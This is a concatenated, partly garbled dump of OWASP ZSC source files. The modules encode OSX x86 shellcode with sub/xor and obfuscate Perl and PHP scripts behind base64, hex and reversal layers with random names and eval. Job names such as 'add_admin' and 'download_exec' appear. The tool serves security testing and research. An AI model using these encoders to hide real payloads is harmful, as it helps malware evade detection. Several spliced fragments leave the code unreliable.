binascii.b2a_hex(''.join(random.choice(chars) 23 | for i in range(1))) 24 | if _version is 3: 25 | eax_1 = (binascii.b2a_hex((''.join(random.choice( 26 | chars) for i in range(1))).encode('latin-1')) 27 | ).decode('latin-1') 28 | eax_1 = str('0') + str(eax_1[1]) 29 | eax_2 = "%x" % (int(eax, 16) + int(eax_1, 16)) 30 | if eax > eax_1: 31 | if '00' not in str(eax_1) and '00' not in str(eax_2): 32 | t = False 33 | 34 | A = 0 35 | eax = 'push $%s' % (str(eax)) 36 | if '-' in eax_2: 37 | A = 1 38 | eax_2 = eax_2.replace('-', '') 39 | eax_sub = 'push $0x%s\npop %%eax\nneg %%eax\nsub $0x%s,%%eax\n' % ( 40 | eax_2, eax_1) 41 | 42 | if A is 0: 43 | eax_sub = 'push $0x%s\npop %%eax\nsub $0x%s,%%eax\n' % (eax_2, 44 | eax_1) 45 | shellcode = shellcode.replace('mov $0x3b,%al', eax_sub) 46 | for line in shellcode.rsplit('\n'): 47 | if 'push' in line and '$0x' in line and ',' not in line and len( 48 | line) > 14: 49 | data = line.rsplit('push')[1].rsplit('$0x')[1] 50 | t = True 51 | while t: 52 | if _version is 2: 53 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars) 54 | for i in range(4))) 55 | if _version is 3: 56 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 57 | chars) for i in range(4))).encode('latin-1')) 58 | ).decode('latin-1') 59 | ebx_2 = "%x" % (int(data, 16) + int(ebx_1, 16)) 60 | if str('00') not in str(ebx_1) and str('00') not in str( 61 | ebx_2) and len(ebx_2.replace( 62 | '-', '')) >= 7 and len( 63 | ebx_1) >= 7 and '-' not in ebx_1: 64 | ebx_2 = ebx_2.replace('-', '') 65 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nsub %%ebx,%%eax\npush %%eax\n' % ( 66 | str(ebx_1), str(ebx_2)) 67 | shellcode = shellcode.replace(line, command) 68 | t = False 69 | 70 | if job == "system": 71 | for line in shellcode.rsplit('\n'): 72 | if 'push' in line and '$0x' in line and ',' not in line and len( 73 | line) > 14: 74 | data = line.rsplit('push')[1].rsplit('$0x')[1] 75 | t = True 76 | while t: 77 | if _version is 2: 78 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars) 79 | for i in range(4))) 80 | if _version is 3: 81 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 82 | chars) for i in range(4))).encode('latin-1')) 83 | ).decode('latin-1') 84 | ebx_2 = "%x" % (int(data, 16) + int(ebx_1, 16)) 85 | 86 | if str('00') not in str(ebx_1) and str('00') not in str( 87 | ebx_2) and len(ebx_2) >= 7 and len( 88 | ebx_1) >= 7 and '-' not in ebx_1: 89 | ebx_2 = ebx_2.replace('-', '') 90 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nsub %%ebx,%%eax\npush %%eax\n' % ( 91 | str(ebx_1), str(ebx_2)) 92 | shellcode = shellcode.replace(line, command) 93 | t = False 94 | 95 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/sub_yourvalue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | 11 | def start(type, shellcode, job): 12 | 13 | if job == "exec": 14 | value = str(type.rsplit('sub_')[1][2:]) 15 | t = True 16 | eax = str('0x3b909090') 17 | eax_1 = value 18 | eax_2 = "%x" % (int(eax, 16) + int(eax_1, 16)) 19 | A = 0 20 | eax = 'push $%s' % (str(eax)) 21 | if '-' in eax_2: 22 | A = 1 23 | eax_2 = eax_2.replace('-', '') 24 | eax_sub = 'push $0x%s\npop %%eax\nneg %%eax\nsub $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 25 | eax_2, eax_1) 26 | 27 | if A is 0: 28 | eax_sub = 'push $0x%s\npop %%eax\nsub $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 29 | eax_2, eax_1) 30 | shellcode = shellcode.replace('mov $0x3b,%al', eax_sub) 31 | A = 0 32 | for line in shellcode.rsplit('\n'): 33 | if '_z3r0d4y_' in line: 34 | A = 1 35 | if 'push' in line and '$0x' in line and ',' not in line and len( 36 | line) > 14 and A is 1: 37 | data = line.rsplit('push')[1].rsplit('$0x')[1] 38 | t = True 39 | while t: 40 | ebx_1 = value 41 | ebx_2 = "%x" % (int(data, 16) + int(ebx_1, 16)) 42 | 43 | if str('00') not in str(ebx_1) and str('00') not in str( 44 | ebx_2) and len(ebx_2) >= 7 and len( 45 | ebx_1) >= 7 and '-' not in ebx_1: 46 | ebx_2 = ebx_2.replace('-', '') 47 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nsub %%ebx,%%eax\npush %%eax\n' % ( 48 | str(ebx_1), str(ebx_2)) 49 | shellcode = shellcode.replace(line, command) 50 | t = False 51 | shellcode = shellcode.replace('_z3r0d4y_', '') 52 | if job == "system": 53 | value = str(type.rsplit('sub_')[1][2:]) 54 | for line in shellcode.rsplit('\n'): 55 | if 'push' in line and '$0x' in line and ',' not in line and len( 56 | line) > 14: 57 | data = line.rsplit('push')[1].rsplit('$0x')[1] 58 | ebx_1 = value 59 | ebx_2 = "%x" % (int(data, 16) + int(ebx_1, 16)) 60 | A = 0 61 | if str('-') in str(ebx_2): 62 | ebx_2 = ebx_2.replace('-', '') 63 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nsub %%ebx,%%eax\npush %%eax\n' % ( 64 | str(ebx_1), str(ebx_2)) 65 | A = 1 66 | if A is 0: 67 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nsub %%ebx,%%eax\npush %%eax\n' % ( 68 | str(ebx_1), str(ebx_2)) 69 | shellcode = shellcode.replace(line, command) 70 | 71 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/xor_random.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random, binascii, string 10 | from core.compatible import version 11 | _version = version() 12 | chars = string.digits + string.ascii_letters 13 | 14 | 15 | def start(shellcode, job): 16 | if "system" == job: 17 | for line in shellcode.rsplit('\n'): 18 | if 'push' in line and '$0x' in line and ',' not in line and len( 19 | line) > 14: 20 | data = line.rsplit('push')[1].rsplit('$0x')[1] 21 | t = True 22 | while t: 23 | if _version is 2: 24 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars) 25 | for i in range(4))) 26 | if _version is 3: 27 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 28 | chars) for i in range(4))).encode('latin-1')) 29 | ).decode('latin-1') 30 | ebx_2 = "%x" % (int(data, 16) ^ int(ebx_1, 16)) 31 | 32 | if str('00') not in str(ebx_1) and str('00') not in str( 33 | ebx_2) and len(ebx_2) >= 7 and len( 34 | ebx_1) >= 7 and '-' not in ebx_1: 35 | ebx_2 = ebx_2.replace('-', '') 36 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nxor %%ebx,%%eax\npush %%eax\n' % ( 37 | str(ebx_1), str(ebx_2)) 38 | shellcode = shellcode.replace(line, command) 39 | t = False 40 | 41 | if "exec" == job: 42 | t = True 43 | eax = str('0x3b') 44 | while t: 45 | if _version is 2: 46 | eax_1 = binascii.b2a_hex(''.join(random.choice(chars) 47 | for i in range(1))) 48 | if _version is 3: 49 | eax_1 = (binascii.b2a_hex((''.join(random.choice( 50 | chars) for i in range(1))).encode('latin-1')) 51 | ).decode('latin-1') 52 | eax_1 = str('0') + str(eax_1[1]) 53 | eax_2 = "%x" % (int(eax, 16) ^ int(eax_1, 16)) 54 | if eax > eax_1: 55 | if '00' not in str(eax_1) and '00' not in str(eax_2): 56 | t = False 57 | 58 | A = 0 59 | eax = 'push $%s' % (str(eax)) 60 | if '-' in eax_2: 61 | A = 1 62 | eax_2 = eax_2.replace('-', '') 63 | eax_xor = 'push $0x%s\npop %%eax\nneg %%eax\nxor $0x%s,%%eax\n' % ( 64 | eax_2, eax_1) 65 | 66 | if A is 0: 67 | eax_xor = 'push $0x%s\npop %%eax\nxor $0x%s,%%eax\n' % (eax_2, 68 | eax_1) 69 | shellcode = shellcode.replace('mov $0x3b,%al', eax_xor) 70 | for line in shellcode.rsplit('\n'): 71 | if 'push' in line and '$0x' in line and ',' not in line and len( 72 | line) > 14: 73 | data = line.rsplit('push')[1].rsplit('$0x')[1] 74 | t = True 75 | while t: 76 | if _version is 2: 77 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars) 78 | for i in range(4))) 79 | if _version is 3: 80 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 81 | chars) for i in range(4))).encode('latin-1')) 82 | ).decode('latin-1') 83 | ebx_2 = "%x" % (int(data, 16) ^ int(ebx_1, 16)) 84 | if str('00') not in str(ebx_1) and str('00') not in str( 85 | ebx_2) and len(ebx_2.replace( 86 | '-', '')) >= 7 and len( 87 | ebx_1) >= 7 and '-' not in ebx_1: 88 | ebx_2 = ebx_2.replace('-', '') 89 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nxor %%ebx,%%eax\npush %%eax\n' % ( 90 | str(ebx_1), str(ebx_2)) 91 | shellcode = shellcode.replace(line, command) 92 | t = False 93 | 94 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/xor_yourvalue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | 11 | def start(type, shellcode, job): 12 | 13 | if "exec" == job: 14 | value = str(type.rsplit('xor_')[1][2:]) 15 | t = True 16 | eax = str('0x3b909090') 17 | eax_1 = value 18 | eax_2 = "%x" % (int(eax, 16) ^ int(eax_1, 16)) 19 | A = 0 20 | eax = 'push $%s' % (str(eax)) 21 | if '-' in eax_2: 22 | A = 1 23 | eax_2 = eax_2.replace('-', '') 24 | eax_xor = 'push $0x%s\npop %%eax\nneg %%eax\nxor $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 25 | eax_2, eax_1) 26 | 27 | if A is 0: 28 | eax_xor = 'push $0x%s\npop %%eax\nxor $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 29 | eax_2, eax_1) 30 | shellcode = shellcode.replace('mov $0x3b,%al', eax_xor) 31 | A = 0 32 | for line in shellcode.rsplit('\n'): 33 | if '_z3r0d4y_' in line: 34 | A = 1 35 | if 'push' in line and '$0x' in line and ',' not in line and len( 36 | line) > 14 and A is 1: 37 | data = line.rsplit('push')[1].rsplit('$0x')[1] 38 | t = True 39 | while t: 40 | ebx_1 = value 41 | ebx_2 = "%x" % (int(data, 16) ^ int(ebx_1, 16)) 42 | 43 | if str('00') not in str(ebx_1) and str('00') not in str( 44 | ebx_2) and len(ebx_2) >= 7 and len( 45 | ebx_1) >= 7 and '-' not in ebx_1: 46 | ebx_2 = ebx_2.replace('-', '') 47 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nxor %%ebx,%%eax\npush %%eax\n' % ( 48 | str(ebx_1), str(ebx_2)) 49 | shellcode = shellcode.replace(line, command) 50 | t = False 51 | shellcode = shellcode.replace('_z3r0d4y_', '') 52 | 53 | if "system" == job: 54 | value = str(type.rsplit('xor_')[1][2:]) 55 | for line in shellcode.rsplit('\n'): 56 | if 'push' in line and '$0x' in line and ',' not in line and len( 57 | line) > 14: 58 | data = line.rsplit('push')[1].rsplit('$0x')[1] 59 | ebx_1 = value 60 | ebx_2 = "%x" % (int(data, 16) ^ int(ebx_1, 16)) 61 | A = 0 62 | if str('-') in str(ebx_2): 63 | ebx_2 = ebx_2.replace('-', '') 64 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nxor %%ebx,%%eax\npush %%eax\n' % ( 65 | str(ebx_1), str(ebx_2)) 66 | A = 1 67 | if A is 0: 68 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nxor %%ebx,%%eax\npush %%eax\n' % ( 69 | str(ebx_1), str(ebx_2)) 70 | shellcode = shellcode.replace(line, command) 71 | 72 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/perl/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/encoder/perl/base64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | 15 | 16 | def encode(f): 17 | val_name = ''.join( 18 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 19 | for i in range(50)) 20 | data = '' 21 | eval = '$' + val_name 22 | if _version is 2: 23 | data = '$' + val_name + ' = "' + str(binascii.b2a_base64(f)).replace( 24 | '\n', '') + '";\n' 25 | 26 | if _version is 3: 27 | data = '$' + val_name + ' = "' + str(binascii.b2a_base64(f.encode( 28 | 'latin-1')).decode('latin-1').replace('\n', '')) + '";\n' 29 | 30 | var_str = '$' + ''.join( 31 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 32 | for i in range(50)) 33 | var_data = '$' + ''.join( 34 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 35 | for i in range(50)) 36 | func_name = ''.join( 37 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 38 | for i in range(50)) 39 | func_argv = '$' + ''.join( 40 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 41 | for i in range(50)) 42 | f = ''' 43 | use MIME::Base64 qw(decode_base64); 44 | %s 45 | sub %s { 46 | %s = shift; 47 | %s = decode_base64(%s); 48 | return %s; 49 | } 50 | %s = %s; 51 | eval %s(%s); 52 | ''' % (data, func_name, func_argv, var_str, func_argv, var_str, var_data, eval, 53 | func_name, var_data) 54 | return f 55 | 56 | 57 | def start(content,cli): 58 | return str(str('=begin\n') + str(content.replace( 59 | '=begin', '#=begin').replace('=cut', '#=cut')) + str('\n=cut') + str( 60 | encode(content)) + str('\n')) 61 | -------------------------------------------------------------------------------- /lib/encoder/perl/simple_ascii.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import string 11 | 12 | 13 | def encode(f): 14 | var_name = '$' + ''.join( 15 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 16 | for i in range(50)) 17 | ascii_data = ''.join([str(ord(i))+'*' for i in f])[:-1] 18 | data = var_name + ' = "' + ascii_data + '";\n' 19 | var_str = '$' + ''.join( 20 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 21 | for i in range(50)) 22 | var_data = '$' + ''.join( 23 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 24 | for i in range(50)) 25 | var_ascii = '@' + ''.join( 26 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 27 | for i in range(50)) 28 | var_value = '$' + ''.join( 29 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 30 | for i in range(50)) 31 | func_name = ''.join( 32 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 33 | for i in range(50)) 34 | func_argv = '$' + ''.join( 35 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 36 | for i in range(50)) 37 | 38 | f = ''' 39 | %s 40 | sub %s { 41 | %s = shift; 42 | %s = ''; 43 | %s = split /\*/, %s; 44 | foreach my %s (%s) { 45 | %s .= chr(%s); 46 | } 47 | return %s; 48 | } 49 | %s = %s; 50 | eval %s(%s); 51 | ''' % (data, func_name, func_argv, var_str, var_ascii, func_argv, var_value, 52 | var_ascii, var_str, var_value, var_str, var_data, var_name, func_name, 53 | var_data) 54 | return f 55 | 56 | 57 | def start(content,cli): 58 | return str(str('=begin\n') + str(content.replace( 59 | '=begin', '#=begin').replace('=cut', '#=cut')) + str('\n=cut') + str( 60 | encode(content)) + str('\n')) 61 | -------------------------------------------------------------------------------- /lib/encoder/perl/simple_base64_rev.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | 15 | 16 | def encode(f): 17 | var_name = '$' + ''.join( 18 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 19 | for i in range(50)) 20 | data = '' 21 | if _version is 2: 22 | rev_data = binascii.b2a_base64(f)[-2::-1] 23 | data = var_name + ' = "' + rev_data + '";\n' 24 | 25 | if _version is 3: 26 | rev_data = binascii.b2a_base64(f.encode('utf8')).decode('utf8')[-2::-1] 27 | data = var_name + ' = "' + rev_data + '";\n' 28 | 29 | var_str = '$' + ''.join( 30 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 31 | for i in range(50)) 32 | var_data = '$' + ''.join( 33 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 34 | for i in range(50)) 35 | func_name = ''.join( 36 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 37 | for i in range(50)) 38 | func_argv = '$' + ''.join( 39 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 40 | for i in range(50)) 41 | 42 | f = ''' 43 | use MIME::Base64 qw(decode_base64); 44 | %s 45 | sub %s { 46 | %s = shift; 47 | %s = decode_base64(reverse %s); 48 | return %s; 49 | } 50 | %s = %s; 51 | eval %s(%s); 52 | ''' % (data, func_name, func_argv, var_str, func_argv, var_str, var_data, 53 | var_name, func_name, var_data) 54 | return f 55 | 56 | 57 | def start(content,cli): 58 | return str(str('=begin\n') + str(content.replace( 59 | '=begin', '#=begin').replace('=cut', '#=cut')) + str('\n=cut') + str( 60 | encode(content)) + str('\n')) 61 | -------------------------------------------------------------------------------- /lib/encoder/perl/simple_hex.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | 15 | 16 | def encode(f): 17 | hex_arr = [] 18 | val_names = [] 19 | data = '' 20 | eval = '' 21 | n = 0 22 | m = 0 23 | for line in f: 24 | if _version is 2: 25 | hex_arr.append(str(binascii.b2a_hex(line))) 26 | if _version is 3: 27 | hex_arr.append(str((binascii.b2a_hex(str(line).encode('latin-1')) 28 | ).decode('latin-1'))) 29 | length = len(hex_arr) 30 | while (length != 0): 31 | val_names.append(''.join(random.choice(string.ascii_lowercase + 32 | string.ascii_uppercase) 33 | for i in range(50))) 34 | length -= 1 35 | for hex in hex_arr: 36 | data += '$' + val_names[n] + ' = "' + str(hex) + '";\n' 37 | n += 1 38 | while (m <= n - 1): 39 | eval += '$' + val_names[m] + '.' 40 | m += 1 41 | var_str = '$' + ''.join( 42 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 43 | for i in range(50)) 44 | var_counter = '$' + ''.join( 45 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 46 | for i in range(50)) 47 | var_data = '$' + ''.join( 48 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 49 | for i in range(50)) 50 | func_name = ''.join( 51 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 52 | for i in range(50)) 53 | func_argv = '$' + ''.join( 54 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 55 | for i in range(50)) 56 | 57 | f = ''' 58 | %s 59 | sub %s { 60 | %s = shift; 61 | for(%s = 0; %s < length %s; %s += 2) { 62 | %s .= chr(hex(substr(%s,%s,2))); 63 | } 64 | return %s; 65 | } 66 | %s = %s; 67 | eval %s(%s); 68 | ''' % (data, func_name, func_argv, var_counter, var_counter, func_argv, 69 | var_counter, var_str, func_argv, var_counter, var_str, var_data, 70 | eval[:-1], func_name, var_data) 71 | return f 72 | 73 | 74 | def start(content,cli): 75 | return str(str('=begin\n') + str(content.replace( 76 | '=begin', '#=begin').replace('=cut', '#=cut')) + str('\n=cut') + str( 77 | encode(content)) + str('\n')) 78 | -------------------------------------------------------------------------------- /lib/encoder/perl/simple_hex_rev.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | 15 | 16 | def encode(f): 17 | var_name = '$' + ''.join( 18 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 19 | for i in range(50)) 20 | data = '' 21 | if _version is 2: 22 | rev_data = binascii.b2a_hex(f)[::-1] 23 | data = var_name + ' = "' + rev_data + '";\n' 24 | 25 | if _version is 3: 26 | rev_data = binascii.b2a_hex(f.encode('utf8')).decode('utf8')[::-1] 27 | data = var_name + ' = "' + rev_data + '";\n' 28 | 29 | var_str = '$' + ''.join( 30 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 31 | for i in range(50)) 32 | var_counter = '$' + ''.join( 33 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 34 | for i in range(50)) 35 | var_data = '$' + ''.join( 36 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 37 | for i in range(50)) 38 | var_rev = '$' + ''.join( 39 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 40 | for i in range(50)) 41 | func_name = ''.join( 42 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 43 | for i in range(50)) 44 | func_argv = '$' + ''.join( 45 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 46 | for i in range(50)) 47 | f = ''' 48 | %s 49 | sub %s { 50 | %s = shift; 51 | %s = reverse %s; 52 | for(%s = 0; %s < length %s; %s += 2) { 53 | %s .= chr(hex(substr(%s,%s,2))); 54 | } 55 | return %s; 56 | } 57 | %s = %s; 58 | eval %s(%s); 59 | ''' % (data, func_name, func_argv, var_rev, func_argv, var_counter, 60 | var_counter, var_rev, var_counter, var_str, var_rev, var_counter, 61 | var_str, var_data, var_name, func_name, var_data) 62 | return f 63 | 64 | 65 | def start(content,cli): 66 | return str(str('=begin\n') + str(content.replace( 67 | '=begin', '#=begin').replace('=cut', '#=cut')) + str('\n=cut') + str( 68 | encode(content)) + str('\n')) 69 | -------------------------------------------------------------------------------- /lib/encoder/php/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/encoder/php/base64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | from core.alert import * 14 | from core.get_input import _input 15 | _version = version() 16 | 17 | 18 | def encode(f): 19 | val_name = ''.join( 20 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 21 | for i in range(50)) 22 | data = '' 23 | eval = '$' + val_name 24 | if _version is 2: 25 | data = '$' + val_name + ' = "' + str(binascii.b2a_base64(f)).replace( 26 | '\n', '') + '";\n' 27 | 28 | if _version is 3: 29 | data = '$' + val_name + ' = "' + str(binascii.b2a_base64(f.encode( 30 | 'latin-1')).decode('latin-1').replace('\n', '')) + '";\n' 31 | 32 | var_str = '$' + ''.join( 33 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 34 | for i in range(50)) 35 | var_data = '$' + ''.join( 36 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 37 | for i in range(50)) 38 | func_name = ''.join( 39 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 40 | for i in range(50)) 41 | func_argv = '$' + ''.join( 42 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 43 | for i in range(50)) 44 | f = ''' 45 | %s 46 | function %s(%s) { 47 | %s = base64_decode(%s); 48 | return %s; 49 | } 50 | %s = %s; 51 | eval(%s(%s)); 52 | ?>''' % (data, func_name, func_argv, var_str, func_argv, var_str, var_data, 53 | eval, func_name, var_data) 54 | return f 55 | 56 | 57 | def start(content,cli): 58 | if '' in content or ' or ', '') 71 | elif answer == 'no' or answer == 'n': 72 | pass 73 | else: 74 | warn('You had to answer with yes or no, We count that as "no"\n') 75 | return str(str('''' % (data, func_name, func_argv, var_str, func_argv, var_str, var_data, 51 | var_name, func_name, var_data) 52 | return f 53 | 54 | 55 | def start(content,cli): 56 | if '' in content or ' or ', '') 69 | elif answer == 'no' or answer == 'n': 70 | pass 71 | else: 72 | warn('You had to answer with yes or no, We count that as "no"\n') 73 | return str(str('''' % (data, func_name, func_argv, var_str, func_argv, var_str, func_name, eval) 51 | return f 52 | 53 | 54 | def start(content,cli): 55 | if '' in content or ' or ', '') 68 | elif answer == 'no' or answer == 'n': 69 | pass 70 | else: 71 | warn('You had to answer with yes or no, We count that as "no"\n') 72 | return str(str('''' % (data, func_name, func_argv, var_str, var_ascii, func_argv, var_ascii, 51 | var_value, var_str, var_value, var_str, var_data, var_name, func_name, 52 | var_data) 53 | return f 54 | 55 | 56 | def start(content,cli): 57 | if '' in content or ' or ', '') 70 | elif answer == 'no' or answer == 'n': 71 | pass 72 | else: 73 | warn('You had to answer with yes or no, We count that as "no"\n') 74 | return str(str('''' % (data, func_name, func_argv, var_counter, var_counter, func_argv, 71 | var_counter, var_str, func_argv, var_counter, var_str, var_data, 72 | eval[:-1], func_name, var_data) 73 | return f 74 | 75 | 76 | def start(content,cli): 77 | if '' in content or ' or ', '') 90 | elif answer == 'no' or answer == 'n': 91 | pass 92 | else: 93 | warn('You had to answer with yes or no, We count that as "no"\n') 94 | return str(str('=0;%s-=2) 51 | %s .= chr(hexdec(strrev(substr(%s,%s,2)))); 52 | return %s; 53 | } 54 | %s = %s; 55 | eval(%s(%s)); 56 | 57 | ?>''' % (data, func_name, func_argv, var_str, var_counter, func_argv, 58 | var_counter, var_counter, var_str, func_argv, var_counter, var_str, 59 | var_data, var_name, func_name, var_data) 60 | return f 61 | 62 | 63 | def start(content,cli): 64 | if '' in content or ' or ', '') 77 | elif answer == 'no' or answer == 'n': 78 | pass 79 | else: 80 | warn('You had to answer with yes or no, We count that as "no"\n') 81 | return str(str(' 14: 21 | data = line.rsplit('push')[1].rsplit('$0x')[1] 22 | t = True 23 | while t: 24 | if _version is 2: 25 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars) 26 | for i in range(4))) 27 | if _version is 3: 28 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 29 | chars) for i in range(4))).encode('latin-1')) 30 | ).decode('latin-1') 31 | ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16)) 32 | if str('00') not in str(ebx_1) and str('00') not in str( 33 | ebx_2) and '-' in ebx_2 and len(ebx_2.replace( 34 | '-', '')) >= 7 and len( 35 | ebx_1) > 7 and '-' not in ebx_1: 36 | ebx_2 = ebx_2.replace('-', '') 37 | if job == 'exec' or job == 'add_admin' or job == 'dir_create' or job == 'download_exec': 38 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nneg 